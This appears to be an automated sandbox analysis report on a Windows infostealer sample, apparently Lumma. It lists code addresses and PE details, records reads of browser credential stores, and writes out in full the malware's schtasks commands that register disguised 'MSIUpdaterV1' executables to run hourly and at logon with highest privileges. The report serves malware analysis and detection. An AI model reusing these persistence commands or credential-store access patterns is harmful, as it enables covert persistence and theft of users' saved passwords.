Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004BBBF0	22_2_004BBBF0
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_00418BAD	22_2_00418BAD
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_00418BAD	22_2_00418BAD
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003EEBD0	22_2_003EEBD0
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003EEBD0	22_2_003EEBD0
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_00393C50	22_2_00393C50
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_00400D50	22_2_00400D50
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_00400D50	22_2_00400D50
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003FED18	22_2_003FED18
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003FED18	22_2_003FED18
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004B9D60	22_2_004B9D60
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004B9D60	22_2_004B9D60
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003A7D08	22_2_003A7D08
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_00411E74	22_2_00411E74
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_00411E74	22_2_00411E74
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003B1E95	22_2_003B1E95
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004A8F90	22_2_004A8F90
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004A8F90	22_2_004A8F90
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_0041CFA0	22_2_0041CFA0
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_0041CFA0	22_2_0041CFA0
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004B1120	22_2_004B1120
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_0041D220	22_2_0041D220
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_0041D220	22_2_0041D220
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004BA2B0	22_2_004BA2B0
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004B13C0	22_2_004B13C0
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004B13C0	22_2_004B13C0
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004B03C0	22_2_004B03C0
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004B9470	22_2_004B9470
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004B9470	22_2_004B9470
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_0040441D	22_2_0040441D
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_0040441D	22_2_0040441D
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003FB590	22_2_003FB590
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003FB590	22_2_003FB590
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_0040475F	22_2_0040475F
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_0040475F	22_2_0040475F
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004B7850	22_2_004B7850
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004B7850	22_2_004B7850
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003FEEDF	22_2_003FEEDF
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_001131B0	23_2_001131B0
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0018441D	23_2_0018441D
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0018441D	23_2_0018441D
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0017B590	23_2_0017B590
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0017B590	23_2_0017B590
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0018475F	23_2_0018475F
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0018475F	23_2_0018475F
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_001298A9	23_2_001298A9
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00124900	23_2_00124900
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00173970	23_2_00173970
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00173970	23_2_00173970
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00120A52	23_2_00120A52
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00198BAD	23_2_00198BAD
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00198BAD	23_2_00198BAD
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0016EBD0	23_2_0016EBD0
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0016EBD0	23_2_0016EBD0
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00113C50	23_2_00113C50
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00166C70	23_2_00166C70
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0017ED18	23_2_0017ED18
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0017ED18	23_2_0017ED18
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00127D08	23_2_00127D08
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00180D50	23_2_00180D50
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00180D50	23_2_00180D50
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00191E74	23_2_00191E74
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00191E74	23_2_00191E74
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00131E95	23_2_00131E95
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00166C70	23_2_00166C70
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0019D220	23_2_0019D220
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0023A2B0	23_2_0023A2B0
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_002313C0	23_2_002313C0
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0018441D	23_2_0018441D
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0018441D	23_2_0018441D
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00239470	23_2_00239470
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0017B590	23_2_0017B590
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0017B590	23_2_0017B590
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0018475F	23_2_0018475F
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0018475F	23_2_0018475F
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00237850	23_2_00237850
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00173970	23_2_00173970
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00173970	23_2_00173970
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00198BAD	23_2_00198BAD
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00198BAD	23_2_00198BAD
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0016EBD0	23_2_0016EBD0
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0016EBD0	23_2_0016EBD0
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0023BBF0	23_2_0023BBF0
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0017EEDF	23_2_0017EEDF

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: String function: 00408683 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: String function: 003F8770 appears 152 times
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: String function: 00405654 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: String function: 0039BB70 appears 47 times
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: String function: 00188683 appears 76 times
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: String function: 00178770 appears 184 times
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: String function: 00185654 appears 48 times
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: String function: 0011BB70 appears 47 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00408800 appears 57 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040FC30 appears 188 times

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 276

Source: OJa1BOigU3.exe

Static PE information: invalid certificate

Source: OJa1BOigU3.exe	Static PE information: Resource name: TYPELIB type: Zip archive data, at least v1.0 to extract, compression method=store
Source: Retailer_prog[1].exe.0.dr	Static PE information: Resource name: TYPELIB type: Zip archive data, at least v1.0 to extract, compression method=store
Source: 3Q7v9y6Zw0a51Z43zHih.exe.0.dr	Static PE information: Resource name: TYPELIB type: Zip archive data, at least v1.0 to extract, compression method=store
Source: AdobeUpdaterV1.exe.0.dr	Static PE information: Resource name: TYPELIB type: Zip archive data, at least v1.0 to extract, compression method=store
Source: MSIUpdaterV1.exe.0.dr	Static PE information: Resource name: TYPELIB type: Zip archive data, at least v1.0 to extract, compression method=store

Source: OJa1BOigU3.exe, 00000000.00000000.1624165206.0000000000BC8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameData.Services.Client.SL.dll@ vs OJa1BOigU3.exe
Source: OJa1BOigU3.exe, 00000000.00000003.2278188796.00000000068DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNETCrypt.exe4 vs OJa1BOigU3.exe
Source: OJa1BOigU3.exe, 00000000.00000003.2247239644.000000000650B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameData.Services.Client.SL.dll@ vs OJa1BOigU3.exe
Source: OJa1BOigU3.exe, 00000000.00000003.2248766150.000000000650D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameData.Services.Client.SL.dll@ vs OJa1BOigU3.exe
Source: OJa1BOigU3.exe	Binary or memory string: OriginalFilenameData.Services.Client.SL.dll@ vs OJa1BOigU3.exe

Source: OJa1BOigU3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: lumma2804[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: U8cABsPhZFkKRrQ4rE0N.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AdobeUpdaterV1.exe0.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: MSIUpdaterV1.exe0.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: retailerTest[1].exe.0.dr	Static PE information: Section: .bss ZLIB complexity 0.9998960722477064
Source: v6ggwc2fJXXgIu5fzDQ2.exe.0.dr	Static PE information: Section: .bss ZLIB complexity 0.9998960722477064
Source: AdobeUpdaterV1.exe1.0.dr	Static PE information: Section: .bss ZLIB complexity 0.9998960722477064
Source: MSIUpdaterV1.exe1.0.dr	Static PE information: Section: .bss ZLIB complexity 0.9998960722477064

Source: lumma2804[1].exe.0.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: U8cABsPhZFkKRrQ4rE0N.exe.0.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: AdobeUpdaterV1.exe0.0.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: MSIUpdaterV1.exe0.0.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@65/57@4/6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 17_2_0042F5FF CoCreateInstance,

17_2_0042F5FF

Source: C:\Users\user\Desktop\OJa1BOigU3.exe

File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\signons.sqlite

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_03
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5076
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4852:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2316:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4412
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3248
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3960:120:WilError_03

Source: C:\Users\user\Desktop\OJa1BOigU3.exe

File created: C:\Users\user\AppData\Local\Temp\trixy0MMV3ZTZWJef

Jump to behavior

Source: C:\Users\user\Desktop\OJa1BOigU3.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\OJa1BOigU3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MSIUpdaterV1.exe, MSIUpdaterV1.exe, 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, AdobeUpdaterV1.exe, 00000018.00000002.3501914697.000000000086D000.00000002.00000001.01000000.0000000C.sdmp, MSIUpdaterV1.exe, 0000001C.00000002.2896175092.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, RegAsm.exe, 0000002A.00000002.3500098630.000000000056D000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: OJa1BOigU3.exe, 00000000.00000002.2345345627.000000000026D000.00000002.00000001.01000000.00000003.sdmp, 3Q7v9y6Zw0a51Z43zHih.exe, 00000008.00000002.3501913330.000000000109D000.00000002.00000001.01000000.00000006.sdmp, MSIUpdaterV1.exe, 00000009.00000002.3501554784.000000000079D000.00000002.00000001.01000000.00000007.sdmp, MSIUpdaterV1.exe, 0000000A.00000002.3501305233.000000000079D000.00000002.00000001.01000000.00000007.sdmp, v6ggwc2fJXXgIu5fzDQ2.exe, 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, MSIUpdaterV1.exe, 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, AdobeUpdaterV1.exe, 00000018.00000002.3501914697.000000000086D000.00000002.00000001.01000000.0000000C.sdmp, MSIUpdaterV1.exe, 0000001C.00000002.2896175092.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, RegAsm.exe, 0000002C.00000002.3500058845.000000000055D000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: 7mWIlGgY7rrbLogin Data For Account.0.dr, gsbFct1fEPfFLogin Data.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: OJa1BOigU3.exe	ReversingLabs: Detection: 44%
Source: OJa1BOigU3.exe	Virustotal: Detection: 41%

Source: v6ggwc2fJXXgIu5fzDQ2.exe	String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: MSIUpdaterV1.exe	String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: OJa1BOigU3.exe	String found in binary or memory: l/ADdY

Source: C:\Users\user\Desktop\OJa1BOigU3.exe

File read: C:\Users\user\Desktop\OJa1BOigU3.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\OJa1BOigU3.exe "C:\Users\user\Desktop\OJa1BOigU3.exe"
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe "C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe"
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe "C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe"
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
